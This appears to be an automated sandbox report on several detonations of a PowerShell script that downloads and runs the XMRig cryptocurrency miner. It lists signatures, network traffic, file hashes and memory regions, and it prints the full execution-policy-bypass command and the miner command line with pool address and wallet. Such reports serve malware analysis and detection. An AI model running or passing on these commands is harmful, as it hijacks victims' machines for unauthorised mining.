memory/1420-85-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-86-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-87-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-88-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-89-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-90-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-91-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-92-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-93-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-94-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-95-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-96-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-97-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-98-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-99-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-100-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-101-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-102-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-103-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-104-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-105-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-106-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-107-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-108-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-109-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-110-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-111-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-112-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-113-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-114-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-115-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-116-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-117-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

memory/1420-118-0x00007FF6A0190000-0x00007FF6A0DC3000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:31

Platform

win10-20240404-en

Max time kernel

1794s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 227.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/5068-3-0x00007FFF8D653000-0x00007FFF8D654000-memory.dmp

memory/5068-5-0x0000027F3D220000-0x0000027F3D242000-memory.dmp

memory/5068-8-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/5068-9-0x0000027F3D3D0000-0x0000027F3D446000-memory.dmp

memory/5068-10-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x4xkapu1.etg.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5068-25-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/5068-48-0x0000027F3D3B0000-0x0000027F3D3C2000-memory.dmp

memory/5068-61-0x0000027F3D3A0000-0x0000027F3D3AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/5032-90-0x00000167BFB80000-0x00000167BFBA0000-memory.dmp

memory/5068-91-0x00007FFF8D653000-0x00007FFF8D654000-memory.dmp

memory/5068-92-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/5032-93-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5068-94-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/5032-95-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-96-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-97-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-98-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-99-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-100-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-101-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-102-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-103-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-104-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-105-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-106-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-107-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-108-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-109-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-110-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-111-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-112-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-113-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-114-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-115-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-116-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-117-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-118-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-119-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-120-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-121-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-122-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-123-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-124-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-125-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-126-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-127-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-128-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-129-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-130-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-131-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-132-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-133-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-134-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-135-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-136-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-137-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-138-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-139-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-140-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-141-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-142-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-143-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-144-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-145-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-146-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-147-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-148-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-149-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-150-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-151-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-152-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-153-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-154-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-155-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

memory/5032-156-0x00007FF69A7A0000-0x00007FF69B3D3000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:34

Platform

win11-20240426-en

Max time kernel

1796s

Max time network

1772s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3000-0-0x00007FFC5CB83000-0x00007FFC5CB85000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e5ehwqug.uuv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3000-9-0x0000025D650D0000-0x0000025D650F2000-memory.dmp

memory/3000-10-0x00007FFC5CB80000-0x00007FFC5D642000-memory.dmp

memory/3000-11-0x00007FFC5CB80000-0x00007FFC5D642000-memory.dmp

memory/3000-12-0x00007FFC5CB80000-0x00007FFC5D642000-memory.dmp

memory/3000-14-0x0000025D65170000-0x0000025D65182000-memory.dmp

memory/3000-15-0x0000025D65160000-0x0000025D6516A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/716-46-0x000001ACBE620000-0x000001ACBE640000-memory.dmp

memory/716-47-0x000001AD52390000-0x000001AD523B0000-memory.dmp

memory/716-48-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-49-0x000001AD527D0000-0x000001AD527F0000-memory.dmp

memory/716-50-0x000001AD52A00000-0x000001AD52A20000-memory.dmp

memory/716-51-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/3000-52-0x00007FFC5CB80000-0x00007FFC5D642000-memory.dmp

memory/3000-53-0x00007FFC5CB83000-0x00007FFC5CB85000-memory.dmp

memory/716-54-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-57-0x000001AD52A00000-0x000001AD52A20000-memory.dmp

memory/716-56-0x000001AD527D0000-0x000001AD527F0000-memory.dmp

memory/716-55-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-58-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-59-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-60-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-61-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-62-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-63-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-64-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-65-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-66-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-67-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-68-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-69-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-70-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-71-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-72-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-73-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-74-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-75-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-76-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-77-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-78-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-79-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-80-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-81-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-82-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-83-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-84-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-85-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-86-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-87-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-88-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-89-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-90-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-91-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-92-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-93-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-94-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-95-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-96-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-97-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-98-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-99-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-100-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-101-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-102-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-103-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-104-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-105-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-106-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-107-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-108-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-109-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-110-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-111-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-112-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-113-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-114-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-115-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

memory/716-116-0x00007FF7EEFE0000-0x00007FF7EFC13000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:25

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1773s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
